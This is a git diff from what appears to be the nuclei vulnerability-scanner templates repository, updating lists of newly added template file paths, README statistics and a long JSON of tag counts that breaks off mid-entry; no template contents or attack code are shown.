diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6ea040fb02..a7dd741cba 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,11 +3,23 @@ on: push: paths: - '.new-additions' - - 'http/cves/2022/CVE-2022-1580.yaml' - - 'http/cves/2023/CVE-2023-48084.yaml' - - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - - 'http/vulnerabilities/other/cerio-dt-rce.yaml' + - 'cloud/aws/sns/sns-public-subscribe-access.yaml' + - 'http/cves/2021/CVE-2021-38146.yaml' + - 'http/cves/2021/CVE-2021-38147.yaml' + - 'http/cves/2023/CVE-2023-38194.yaml' + - 'http/cves/2023/CVE-2023-43472.yaml' + - 'http/cves/2023/CVE-2023-6505.yaml' + - 'http/cves/2023/CVE-2023-6786.yaml' + - 'http/cves/2024/CVE-2024-0250.yaml' + - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-37393.yaml' + - 'http/exposed-panels/lorex-panel.yaml' + - 'http/exposed-panels/oracle-application-server-panel.yaml' + - 'http/exposed-panels/veeam-backup-manager-login.yaml' + - 'http/exposed-panels/wildix-collaboration-panel.yaml' + - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' + - 'http/technologies/nperf-server-detect.yaml' + - 'network/detection/mikrotik-ssh-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: diff --git a/.new-additions b/.new-additions index d3ddae9e78..c404334baa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,17 @@ -http/cves/2022/CVE-2022-1580.yaml -http/cves/2023/CVE-2023-48084.yaml -http/default-logins/cambium-networks/cambium-networks-default-login.yaml -http/exposed-panels/vrealize-hyperic-login-panel.yaml -http/vulnerabilities/other/cerio-dt-rce.yaml +cloud/aws/sns/sns-public-subscribe-access.yaml +http/cves/2021/CVE-2021-38146.yaml +http/cves/2021/CVE-2021-38147.yaml +http/cves/2023/CVE-2023-38194.yaml +http/cves/2023/CVE-2023-43472.yaml +http/cves/2023/CVE-2023-6505.yaml +http/cves/2023/CVE-2023-6786.yaml +http/cves/2024/CVE-2024-0250.yaml +http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-37393.yaml +http/exposed-panels/lorex-panel.yaml +http/exposed-panels/oracle-application-server-panel.yaml +http/exposed-panels/veeam-backup-manager-login.yaml +http/exposed-panels/wildix-collaboration-panel.yaml +http/misconfiguration/apache/apache-server-status-localhost.yaml +http/technologies/nperf-server-detect.yaml +network/detection/mikrotik-ssh-detect.yaml diff --git a/README.md b/README.md index cdd58890f5..5941d08a8f 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------| -| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | -| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | -| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | -| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | -| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | -| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 57 | | | | | -| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | -| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | +| cve | 2511 | dhiyaneshdk | 1322 | http | 7547 | info | 3697 | file | 337 | +| panel | 1157 | daffainfo | 865 | file | 337 | high | 1770 | dns | 25 | +| wordpress | 983 | dwisiswant0 | 803 | workflows | 191 | medium | 1528 | | | +| exposure | 948 | pussycat0x | 362 | network | 134 | critical | 1044 | | | +| xss | 911 | ritikchaddha | 354 | cloud | 99 | low | 265 | | | +| wp-plugin | 852 | pikpikcu | 353 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 60 | | | | | +| tech | 686 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 662 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 659 | geeknik | 231 | dast | 21 | | | | | -**640 directories, 8753 files**. +**649 directories, 8828 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index b1b1c7734c..178daf2c21 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2490},{"name":"panel","count":1145},{"name":"wordpress","count":976},{"name":"exposure","count":916},{"name":"xss","count":906},{"name":"wp-plugin","count":847},{"name":"osint","count":804},{"name":"tech","count":682},{"name":"lfi","count":658},{"name":"misconfig","count":620},{"name":"edb","count":599},{"name":"rce","count":594},{"name":"packetstorm","count":530},{"name":"wpscan","count":497},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":421},{"name":"cve2023","count":374},{"name":"unauth","count":366},{"name":"sqli","count":357},{"name":"file","count":346},{"name":"authenticated","count":341},{"name":"intrusive","count":300},{"name":"detect","count":283},{"name":"login","count":276},{"name":"kev","count":268},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":222},{"name":"config","count":221},{"name":"top-200","count":215},{"name":"default-login","count":212},{"name":"osint-social","count":210},{"name":"token","count":193},{"name":"network","count":192},{"name":"","count":192},{"name":"apache","count":189},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":131},{"name":"ssrf","count":119},{"name":"install","count":118},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cms","count":112},{"name":"cve2010","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"top-100","count":100},{"name":"disclosure","count":89},{"name":"aws-cloud-config","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"privesc","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":71},{"name":"cve2024","count":69},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"js","count":63},{"name":"adobe","count":62},{"name":"ir","count":61},{"name":"cve2015","count":59},{"name":"huntr","count":59},{"name":"atlassian","count":57},{"name":"cve2016","count":57},{"name":"google","count":56},{"name":"enum","count":56},{"name":"vmware","count":56},{"name":"c2","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"jndi","count":44},{"name":"debug","count":44},{"name":"php","count":44},{"name":"cve2014","count":44},{"name":"deserialization","count":43},{"name":"traversal","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"plugin","count":42},{"name":"osint-porn","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"cnvd","count":40},{"name":"misc","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"listing","count":37},{"name":"jira","count":37},{"name":"cti","count":36},{"name":"ibm","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"dlink","count":30},{"name":"tls","count":30},{"name":"wp-theme","count":30},{"name":"ec2","count":30},{"name":"k8s","count":28},{"name":"gitlab","count":28},{"name":"fortinet","count":28},{"name":"api","count":28},{"name":"citrix","count":27},{"name":"bestwebsoft","count":27},{"name":"proxy","count":27},{"name":"firewall","count":26},{"name":"lfr","count":26},{"name":"cve2012","count":26},{"name":"weaver","count":25},{"name":"ssh","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"osint-business","count":24},{"name":"dns","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"osint-finance","count":24},{"name":"zoho","count":24},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"admin","count":23},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"xxe","count":23},{"name":"file-upload","count":23},{"name":"github","count":22},{"name":"s3","count":22},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"printer","count":21},{"name":"msf","count":21},{"name":"weblogic","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"jenkins","count":20},{"name":"camera","count":20},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"grafana","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":19},{"name":"osint-music","count":18},{"name":"coldfusion","count":18},{"name":"cve2011","count":18},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"vpn","count":17},{"name":"node.js","count":17},{"name":"service","count":17},{"name":"confluence","count":17},{"name":"azure","count":17},{"name":"honeypot","count":17},{"name":"mail","count":17},{"name":"nginx","count":17},{"name":"microweber","count":16},{"name":"backup","count":16},{"name":"rconfig","count":16},{"name":"cve2009","count":16},{"name":"jarm","count":16},{"name":"osint-blog","count":16},{"name":"alibaba","count":16},{"name":"status","count":16},{"name":"magento","count":16},{"name":"dashboard","count":15},{"name":"nodejs","count":15},{"name":"cve2008","count":15},{"name":"ruby","count":15},{"name":"woocommerce","count":15},{"name":"zyxel","count":15},{"name":"setup","count":15},{"name":"bypass","count":15},{"name":"tongda","count":15},{"name":"ssti","count":15},{"name":"installer","count":15},{"name":"java","count":15},{"name":"seeyon","count":15},{"name":"backdoor","count":15},{"name":"moosocial","count":15},{"name":"cnvd2021","count":15},{"name":"cve2013","count":15},{"name":"auth","count":14},{"name":"redhat","count":14},{"name":"docker","count":14},{"name":"domainmod","count":14},{"name":"osint-health","count":14},{"name":"smb","count":14},{"name":"node","count":14},{"name":"dell","count":14},{"name":"npm","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"windows","count":14},{"name":"jboss","count":14},{"name":"nagios","count":14},{"name":"icewarp","count":14},{"name":"redis","count":14},{"name":"creds-stuffing","count":14},{"name":"rds","count":14},{"name":"smtp","count":14},{"name":"login-check","count":14},{"name":"osint-art","count":14},{"name":"netgear","count":13},{"name":"hashicorp","count":13},{"name":"airflow","count":13},{"name":"rails","count":13},{"name":"graphql","count":13},{"name":"ivanti","count":13},{"name":"cuppa","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"cuppacms","count":13},{"name":"sonicwall","count":13},{"name":"osint-dating","count":13},{"name":"laravel","count":13},{"name":"mysql","count":13},{"name":"fortigate","count":13},{"name":"postgresql","count":13},{"name":"webserver","count":12},{"name":"vbulletin","count":12},{"name":"zimbra","count":12},{"name":"doppler","count":12},{"name":"newrelic","count":12},{"name":"netsweeper","count":12},{"name":"kafka","count":12},{"name":"info-leak","count":12},{"name":"ofbiz","count":12},{"name":"drupal","count":12},{"name":"cache","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"osint-video","count":11},{"name":"online-fire-reporting","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"prometheus","count":11},{"name":"hikvision","count":11},{"name":"iam","count":11},{"name":"xstream","count":11},{"name":"fastjson","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"phpgurukul","count":11},{"name":"jolokia","count":11},{"name":"iis","count":11},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"elasticsearch","count":10},{"name":"samsung","count":10},{"name":"solarview","count":10},{"name":"dahua","count":10},{"name":"db","count":10},{"name":"dropbox","count":10},{"name":"sitecore","count":10},{"name":"solr","count":10},{"name":"digitalocean","count":10},{"name":"dedecms","count":10},{"name":"xstream_project","count":10},{"name":"symfony","count":10},{"name":"zabbix","count":10},{"name":"moodle","count":9},{"name":"vcenter","count":9},{"name":"facebook","count":9},{"name":"cnvd2020","count":9},{"name":"exchange","count":9},{"name":"sangfor","count":9},{"name":"lucee","count":9},{"name":"progress","count":9},{"name":"secret","count":9},{"name":"blind","count":9},{"name":"cloudtrail","count":9},{"name":"wso2","count":9},{"name":"elastic","count":9},{"name":"python","count":9},{"name":"sophos","count":9},{"name":"crlf","count":9},{"name":"pfsense","count":9},{"name":"gitea","count":9},{"name":"druid","count":9},{"name":"artica","count":9},{"name":"scada","count":9},{"name":"bitbucket","count":9},{"name":"opencats","count":9},{"name":"versa","count":9},{"name":"firebase","count":9},{"name":"kube","count":9},{"name":"ognl","count":8},{"name":"mlflow","count":8},{"name":"bucket","count":8},{"name":"discord","count":8},{"name":"error","count":8},{"name":"mirai","count":8},{"name":"recon","count":8},{"name":"gateway","count":8},{"name":"console","count":8},{"name":"cisco-switch","count":8},{"name":"microfocus","count":8},{"name":"phpinfo","count":8},{"name":"spotweb_project","count":8},{"name":"osint-news","count":8},{"name":"metadata","count":8},{"name":"hms","count":8},{"name":"config-audit","count":8},{"name":"emerge","count":8},{"name":"phpjabbers","count":8},{"name":"default-page","count":8},{"name":"symantec","count":8},{"name":"atom","count":8},{"name":"unauthenticated","count":8},{"name":"odoo","count":8},{"name":"huawei","count":8},{"name":"oauth","count":8},{"name":"wanhu","count":8},{"name":"nexus","count":8},{"name":"e-office","count":8},{"name":"manager","count":8},{"name":"cloud-enum","count":8},{"name":"go","count":8},{"name":"spotweb","count":8},{"name":"twitter","count":7},{"name":"keking","count":7},{"name":"nortekcontrol","count":7},{"name":"linkedin","count":7},{"name":"gogs","count":7},{"name":"fpd","count":7},{"name":"squirrelmail","count":7},{"name":"telesquare","count":7},{"name":"bloofox","count":7},{"name":"exploitdb","count":7},{"name":"f5","count":7},{"name":"filemanager","count":7},{"name":"instrusive","count":7},{"name":"database","count":7},{"name":"mongodb","count":7},{"name":"oos","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"nagiosxi","count":7},{"name":"websphere","count":7},{"name":"avtech","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"monstra","count":7},{"name":"rfi","count":7},{"name":"nacos","count":7},{"name":"fortios","count":7},{"name":"ruckus","count":7},{"name":"shopify","count":7},{"name":"blockchain","count":7},{"name":"contec","count":7},{"name":"maps","count":7},{"name":"cacti","count":7},{"name":"joomla\\!","count":7},{"name":"bigip","count":7},{"name":"opensis","count":7},{"name":"activemq","count":7},{"name":"openemr","count":7},{"name":"pmb","count":7},{"name":"landray","count":7},{"name":"solarwinds","count":7},{"name":"moodating","count":7},{"name":"vpc","count":7},{"name":"teamcity","count":7},{"name":"slack","count":7},{"name":"gcp","count":6},{"name":"typo3","count":6},{"name":"splunk","count":6},{"name":"ldap","count":6},{"name":"servicenow","count":6},{"name":"magmi","count":6},{"name":"keycloak","count":6},{"name":"sql","count":6},{"name":"doctor-appointment-system","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"tikiwiki","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"paypal","count":6},{"name":"liferay","count":6},{"name":"synacor","count":6},{"name":"jamf","count":6},{"name":"zhiyuan","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"microstrategy","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"cobbler","count":6},{"name":"advantech","count":6},{"name":"webmin","count":6},{"name":"beyondtrust","count":6},{"name":"flutterwave","count":6},{"name":"server","count":6},{"name":"jetty","count":6},{"name":"chanjet","count":6},{"name":"minio","count":6},{"name":"geoserver","count":6},{"name":"log","count":6},{"name":"rat","count":6},{"name":"asus","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"kubelet","count":6},{"name":"couchdb","count":6},{"name":"leak","count":6},{"name":"sonarqube","count":6},{"name":"bmc","count":6},{"name":"openvpn","count":6},{"name":"sentry","count":5},{"name":"tenda","count":5},{"name":"apisix","count":5},{"name":"ethereum","count":5},{"name":"adb","count":5},{"name":"10web","count":5},{"name":"cve2007","count":5},{"name":"acm","count":5},{"name":"froxlor","count":5},{"name":"thedigitalcraft","count":5},{"name":"web3","count":5},{"name":"matrix","count":5},{"name":"terramaster","count":5},{"name":"metinfo","count":5},{"name":"craftcms","count":5},{"name":"awstats","count":5},{"name":"react","count":5},{"name":"chamilo","count":5},{"name":"agentejo","count":5},{"name":"avideo","count":5},{"name":"goanywhere","count":5},{"name":"zzzcms","count":5},{"name":"akamai","count":5},{"name":"hpe","count":5},{"name":"voip","count":5},{"name":"elementor","count":5},{"name":"axigen","count":5},{"name":"square","count":5},{"name":"gocd","count":5},{"name":"glpi-project","count":5},{"name":"avaya","count":5},{"name":"adminer","count":5},{"name":"jabber","count":5},{"name":"strapi","count":5},{"name":"wbce","count":5},{"name":"storage","count":5},{"name":"jupyter","count":5},{"name":"sysaid","count":5},{"name":"cdata","count":5},{"name":"xmlrpc","count":5},{"name":"paloaltonetworks","count":5},{"name":"qdpm","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"openfire","count":5},{"name":"nuuo","count":5},{"name":"qnap","count":5},{"name":"carrental","count":5},{"name":"pyload","count":5},{"name":"jwt","count":5},{"name":"hoteldruid","count":5},{"name":"percha","count":5},{"name":"webview","count":5},{"name":"openai","count":5},{"name":"graylog","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"parallels","count":5},{"name":"cloudflare","count":5},{"name":"genetechsolutions","count":5},{"name":"caucho","count":5},{"name":"open-emr","count":5},{"name":"totolink","count":5},{"name":"schneider-electric","count":5},{"name":"magmi_project","count":5},{"name":"fatpipe","count":5},{"name":"ems","count":5},{"name":"dionaea","count":5},{"name":"resin","count":5},{"name":"asana","count":5},{"name":"crushftp","count":5},{"name":"cnvd2023","count":5},{"name":"swagger","count":5},{"name":"hybris","count":5},{"name":"openstack","count":5},{"name":"redmine","count":5},{"name":"decision-center","count":5},{"name":"papercut","count":5},{"name":"firmware","count":5},{"name":"circarlife","count":5},{"name":"rseenet","count":5},{"name":"mssql","count":5},{"name":"kkfileview","count":5},{"name":"tibco","count":5},{"name":"sftp","count":5},{"name":"mikrotik","count":5},{"name":"easypost","count":4},{"name":"intelbras","count":4},{"name":"webkul","count":4},{"name":"stripe","count":4},{"name":"reprisesoftware","count":4},{"name":"harbor","count":4},{"name":"puppet","count":4},{"name":"pixie","count":4},{"name":"dom","count":4},{"name":"dolibarr","count":4},{"name":"kingsoft","count":4},{"name":"figma","count":4},{"name":"artifactory","count":4},{"name":"opencms","count":4},{"name":"env","count":4},{"name":"phppgadmin","count":4},{"name":"terra-master","count":4},{"name":"jellyfin","count":4},{"name":"webshell","count":4},{"name":"spark","count":4},{"name":"pentaho","count":4},{"name":"pmb_project","count":4},{"name":"casaos","count":4},{"name":"jsf","count":4},{"name":"wcs","count":4},{"name":"ghost","count":4},{"name":"grav","count":4},{"name":"aria","count":4},{"name":"okta","count":4},{"name":"dahuasecurity","count":4},{"name":"rabbitmq","count":4},{"name":"concrete","count":4},{"name":"metasploit","count":4},{"name":"mcafee","count":4},{"name":"codeigniter","count":4},{"name":"veronalabs","count":4},{"name":"osint-archived","count":4},{"name":"owncloud","count":4},{"name":"igniterealtime","count":4},{"name":"ray","count":4},{"name":"royalevent","count":4},{"name":"flink","count":4},{"name":"thinkcmf","count":4},{"name":"consul","count":4},{"name":"confluent","count":4},{"name":"mostra","count":4},{"name":"info","count":4},{"name":"cve2005","count":4},{"name":"prtg","count":4},{"name":"globalprotect","count":4},{"name":"photo","count":4},{"name":"kentico","count":4},{"name":"search","count":4},{"name":"checkpoint","count":4},{"name":"audiocodes","count":4},{"name":"djangoproject","count":4},{"name":"salesforce","count":4},{"name":"learnpress","count":4},{"name":"hospital_management_system_project","count":4},{"name":"harmistechnology","count":4},{"name":"metabase","count":4},{"name":"roxy","count":4},{"name":"flickr","count":4},{"name":"postmessage","count":4},{"name":"mautic","count":4},{"name":"eclipse","count":4},{"name":"angular","count":4},{"name":"creativeitem","count":4},{"name":"rubyonrails","count":4},{"name":"digitaldruid","count":4},{"name":"telegram","count":4},{"name":"mitel","count":4},{"name":"panos","count":4},{"name":"ebs","count":4},{"name":"bamboo","count":4},{"name":"aura","count":4},{"name":"cnvd2019","count":4},{"name":"pie-register","count":4},{"name":"d-link","count":4},{"name":"metersphere","count":4},{"name":"juniper","count":4},{"name":"moveit","count":4},{"name":"ternaria","count":4},{"name":"mostracms","count":4},{"name":"age-encryption","count":4},{"name":"linkerd","count":4},{"name":"pega","count":4},{"name":"joomlamo","count":4},{"name":"auieo","count":4},{"name":"fit2cloud","count":4},{"name":"jorani","count":4},{"name":"seagate","count":4},{"name":"aspose","count":4},{"name":"dotnet","count":4},{"name":"gnuboard","count":4},{"name":"nosqli","count":4},{"name":"sendgrid","count":4},{"name":"tiki","count":4},{"name":"kyocera","count":4},{"name":"h3c","count":4},{"name":"centos","count":4},{"name":"kevinlab","count":4},{"name":"shiro","count":4},{"name":"sugarcrm","count":4},{"name":"sound4","count":4},{"name":"jfrog","count":4},{"name":"churchcrm","count":4},{"name":"kibana","count":4},{"name":"cnvd2022","count":4},{"name":"httpd","count":4},{"name":"hongdian","count":4},{"name":"candidats","count":4},{"name":"wireguard","count":4},{"name":"rocketchat","count":4},{"name":"hongfan","count":4},{"name":"osgeo","count":4},{"name":"imgproxy","count":4},{"name":"heroku","count":4},{"name":"arcgis","count":4},{"name":"ampache","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"httpserver","count":4},{"name":"finicity","count":4},{"name":"newstatpress","count":4},{"name":"articatech","count":4},{"name":"umbraco","count":4},{"name":"springcloud","count":4},{"name":"os4ed","count":4},{"name":"mailchimp","count":4},{"name":"linksys","count":4},{"name":"mantisbt","count":4},{"name":"http","count":4},{"name":"horde","count":4},{"name":"bittrex","count":4},{"name":"linuxfoundation","count":4},{"name":"powerjob","count":4},{"name":"wpdevart","count":4},{"name":"pip","count":4},{"name":"nextjs","count":4},{"name":"bitrix","count":4},{"name":"newstatpress_project","count":4},{"name":"datadog","count":4},{"name":"password","count":4},{"name":"zend","count":4},{"name":"panabit","count":4},{"name":"telerik","count":4},{"name":"webmail","count":4},{"name":"flatpress","count":4},{"name":"pluginus","count":4},{"name":"zte","count":4},{"name":"wp-statistics","count":4},{"name":"yeswiki","count":4},{"name":"phpjabber","count":4},{"name":"switch","count":3},{"name":"lansweeper","count":3},{"name":"itop","count":3},{"name":"apple","count":3},{"name":"thefactory","count":3},{"name":"truenas","count":3},{"name":"bash","count":3},{"name":"sharepoint","count":3},{"name":"key","count":3},{"name":"grp","count":3},{"name":"modoboa","count":3},{"name":"poms","count":3},{"name":"zeit","count":3},{"name":"teampass","count":3},{"name":"rancher","count":3},{"name":"sudo","count":3},{"name":"eshop","count":3},{"name":"vercel","count":3},{"name":"graph","count":3},{"name":"gibbon","count":3},{"name":"jeesns","count":3},{"name":"dotcms","count":3},{"name":"3cx","count":3},{"name":"instagram","count":3},{"name":"forgerock","count":3},{"name":"soplanning","count":3},{"name":"samba","count":3},{"name":"dokuwiki","count":3},{"name":"credential","count":3},{"name":"etcd","count":3},{"name":"evlink","count":3},{"name":"geowebserver","count":3},{"name":"clusterengine","count":3},{"name":"openbmcs","count":3},{"name":"ad","count":3},{"name":"flutter","count":3},{"name":"voipmonitor","count":3},{"name":"structurizr","count":3},{"name":"i3geo","count":3},{"name":"yii","count":3},{"name":"revive-adserver","count":3},{"name":"webtareas","count":3},{"name":"movable","count":3},{"name":"draytek","count":3},{"name":"posh","count":3},{"name":"discourse","count":3},{"name":"webadmin","count":3},{"name":"imap","count":3},{"name":"superadmin","count":3},{"name":"pulsar","count":3},{"name":"magnolia","count":3},{"name":"epson","count":3},{"name":"self-hosted","count":3},{"name":"e-cology","count":3},{"name":"adiscon","count":3},{"name":"fastly","count":3},{"name":"diagrams","count":3},{"name":"circleci","count":3},{"name":"octobercms","count":3},{"name":"thinfinity","count":3},{"name":"webalizer","count":3},{"name":"inspur","count":3},{"name":"trixbox","count":3},{"name":"pandorafms","count":3},{"name":"limesurvey","count":3},{"name":"cas","count":3},{"name":"myeventon","count":3},{"name":"empirecms","count":3},{"name":"droneci","count":3},{"name":"bitrix24","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"rlm","count":3},{"name":"httpbin","count":3},{"name":"dubbo","count":3},{"name":"ninjaforms","count":3},{"name":"ampps","count":3},{"name":"watchguard","count":3},{"name":"messaging","count":3},{"name":"webcam","count":3},{"name":"avada","count":3},{"name":"gvectors","count":3},{"name":"hsphere","count":3},{"name":"fileman","count":3},{"name":"ruckuswireless","count":3},{"name":"tableau","count":3},{"name":"netdata","count":3},{"name":"nuget","count":3},{"name":"chatgpt","count":3},{"name":"steve","count":3},{"name":"saltstack","count":3},{"name":"intercom","count":3},{"name":"weiphp","count":3},{"name":"aptus","count":3},{"name":"ansible","count":3},{"name":"nuxtjs","count":3},{"name":"school_dormitory_management_system_project","count":3},{"name":"h2o","count":3},{"name":"yzmcms","count":3},{"name":"sony","count":3},{"name":"payara","count":3},{"name":"getsimple","count":3},{"name":"redash","count":3},{"name":"selea","count":3},{"name":"copyparty","count":3},{"name":"academylms","count":3},{"name":"targa","count":3},{"name":"contentful","count":3},{"name":"proftpd","count":3},{"name":"netflix","count":3},{"name":"strangerstudios","count":3},{"name":"mapbox","count":3},{"name":"tautulli","count":3},{"name":"apollo","count":3},{"name":"sidekiq","count":3},{"name":"qlik","count":3},{"name":"newsletter","count":3},{"name":"kavita","count":3},{"name":"forum","count":3},{"name":"smuggling","count":3},{"name":"mooveagency","count":3},{"name":"rackn","count":3},{"name":"opencart","count":3},{"name":"cluster","count":3},{"name":"temenos","count":3},{"name":"gnu","count":3},{"name":"rpm","count":3},{"name":"reddit","count":3},{"name":"xoops","count":3},{"name":"sqlite","count":3},{"name":"qts","count":3},{"name":"jitsi","count":3},{"name":"adafruit","count":3},{"name":"backdropcms","count":3},{"name":"lighttpd","count":3},{"name":"western_digital","count":3},{"name":"petya","count":3},{"name":"xerox","count":3},{"name":"sitemap","count":3},{"name":"lotus","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"securepoint","count":3},{"name":"sharefile","count":3},{"name":"default","count":3},{"name":"modem","count":3},{"name":"fanruan","count":3},{"name":"emqx","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"eyoucms","count":3},{"name":"automattic","count":3},{"name":"softwarepublico","count":3},{"name":"gradle","count":3},{"name":"thruk","count":3},{"name":"tplus","count":3},{"name":"idrac","count":3},{"name":"shell","count":3},{"name":"airtable","count":3},{"name":"esafenet","count":3},{"name":"e-mobile","count":3},{"name":"electron","count":3},{"name":"loytec","count":3},{"name":"xxljob","count":3},{"name":"digitalrebar","count":3},{"name":"pypi","count":3},{"name":"dzzoffice","count":3},{"name":"purchase-order-management-system","count":3},{"name":"spip","count":3},{"name":"axis2","count":3},{"name":"cpanel","count":3},{"name":"dos","count":3},{"name":"osticket","count":3},{"name":"netfortris","count":3},{"name":"clientid","count":3},{"name":"particle","count":3},{"name":"cloudwatch","count":3},{"name":"glassfish","count":3},{"name":"woodwing","count":3},{"name":"wordfence","count":3},{"name":"nifi","count":3},{"name":"casdoor","count":3},{"name":"finecms","count":3},{"name":"decision-server","count":3},{"name":"afterlogic","count":3},{"name":"r-seenet","count":3},{"name":"rstudio","count":3},{"name":"buffalo","count":3},{"name":"purchase-order","count":3},{"name":"mythic","count":3},{"name":"zeroshell","count":3},{"name":"openwrt","count":3},{"name":"zerof","count":3},{"name":"waf","count":3},{"name":"octoprint","count":3},{"name":"favicon","count":3},{"name":"flexvnf","count":3},{"name":"dotnetnuke","count":3},{"name":"trendnet","count":3},{"name":"carel","count":3},{"name":"netlify","count":3},{"name":"fuelcms","count":3},{"name":"piwigo","count":3},{"name":"superset","count":3},{"name":"boldgrid","count":3},{"name":"dvr","count":3},{"name":"postman","count":3},{"name":"bigant","count":3},{"name":"actuator","count":3},{"name":"mpsec","count":3},{"name":"selenium","count":3},{"name":"axway","count":3},{"name":"std42","count":3},{"name":"mailgun","count":3},{"name":"influxdb","count":3},{"name":"monitor","count":3},{"name":"ueditor","count":3},{"name":"synology","count":3},{"name":"ixcache","count":3},{"name":"zendesk","count":3},{"name":"siemens","count":3},{"name":"listserv","count":3},{"name":"unifi","count":3},{"name":"segment","count":3},{"name":"webkul-qloapps","count":3},{"name":"kfm","count":3},{"name":"backdrop","count":3},{"name":"cybelesoft","count":3},{"name":"learndash","count":3},{"name":"drawio","count":3},{"name":"webtareas_project","count":3},{"name":"nortek","count":3},{"name":"openam","count":3},{"name":"covenant","count":3},{"name":"wwbn","count":3},{"name":"axis","count":3},{"name":"spotify","count":3},{"name":"csrf","count":3},{"name":"revive","count":3},{"name":"ithemes","count":3},{"name":"contribsys","count":3},{"name":"labkey","count":3},{"name":"mongo","count":3},{"name":"processwire","count":3},{"name":"fanwei","count":3},{"name":"rubygems","count":3},{"name":"phpipam","count":3},{"name":"dreambox","count":3},{"name":"webnus","count":3},{"name":"supsystic","count":3},{"name":"aruba","count":3},{"name":"telnet","count":3},{"name":"subrion","count":3},{"name":"nc","count":3},{"name":"etsy","count":3},{"name":"webdesi9","count":2},{"name":"sixapart","count":2},{"name":"pickplugins","count":2},{"name":"servicedesk","count":2},{"name":"genieacs","count":2},{"name":"heateor","count":2},{"name":"webuzo","count":2},{"name":"seacms","count":2},{"name":"clansphere","count":2},{"name":"o2","count":2},{"name":"roblox","c